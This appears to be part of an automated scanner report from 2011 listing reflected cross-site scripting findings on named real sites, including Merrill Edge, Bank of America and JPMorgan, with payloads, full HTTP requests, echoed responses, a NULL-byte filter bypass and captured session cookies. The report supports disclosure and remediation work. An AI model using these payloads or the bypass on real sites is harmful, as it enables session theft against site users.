The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.macaudailytimes.com.mo
Path:
/times-lab/21109-Tragedy-our-Commons.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/self-directed-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'BAC1.13948';f91d272c668' ,'Page' : 'self-directed-investing' ,'preview' : false }; //]]> ...[SNIP]...
3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/zero-dollar-trades.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'SDMST1.ed4ab';713afc694b6' ,'Page' : 'zero-dollar-trades' ,'preview' : false }; //]]> ...[SNIP]...
3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 5518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... /ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace") ...[SNIP]...
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 3965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script> ...[SNIP]...
3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.retirement.merrilledge.com
Path:
/IRA/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www2.bankofamerica.com
Path:
/promos/jump/greatdeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:31 GMT Content-type: text/html Set-Cookie: SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; path=/; domain=.bankofamerica.com; secure P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close
<HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33074 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/ Date: Wed, 02 Feb 2011 22:00:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 01:04:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3685 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pages/jpmorgan HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT Date: Wed, 02 Feb 2011 22:19:44 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <t ...[SNIP]... <!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a --> ...[SNIP]...
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
